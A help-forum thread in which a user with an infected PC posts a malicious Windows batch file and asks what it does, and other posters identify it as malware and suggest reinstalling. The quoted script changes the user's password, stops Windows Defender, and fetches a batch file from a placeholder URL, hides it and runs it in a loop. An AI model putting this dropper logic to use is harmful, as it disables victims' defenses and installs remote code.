What do this Batch-File??

[skat3444]

Hi Guys,

my PC is in the moment very laggy, because i have an virus. So, after my research, i found a .bat file with this code:


@echo off
title rundll32.exe
:run
:: registry edits removed
net user %username% NDS
sc stop WinDefend
sc stop Netzwerkmanager
:start
set rtr=%random%
:: url removed :: %~dp0\down.exe http://virus/cs.bat "%tmp%\%rtr%.tmp.bat" >nul
attrib +r +h +s "%tmp%\%rtr%.tmp.bat"
start /B /wait "" "%tmp%\%rtr%.tmp.bat"
ping localhost -n 600 >nul
goto run



can you say me, what is does??? thanks

[foxidrive]

It is malware.

After a short glance I can say that the URL in the batch file is another batch file which ends up running remote registry tools, after deleting files and modifying registry entries.

I think you probably need to reinstall Windows, but I am a bit suspicious because google doesn't return matches for several key items in the batch file.

[skat3444]

Thanks for the quick answer.

Its importend to reinstall windows..?


(Sorry for my bad english :/)

[abc0502]

I think as long as you didn't run it, you are safe just delete it and delete the file that brought that batch to you.

But if you run it, then either you try to find the file that was downloaded and examin it you might find what it does and re-do that. or just re install the windows but i don't think this stupid batch file will do a serious problem as long as it doesn't delete files.

[foxidrive]

It deletes files too - I removed the link to the file as it could be used maliciously.

The download file disables admin, and runs a VBS script too.

[abc0502]

Then it's better to re-install the windows but he could try scanning his system with 2 different anti-virus tools and anti-maleware if re-installing the windows will become annoying, (i find it annoying actually ).

[skat3444]

oh man :/ dangit virus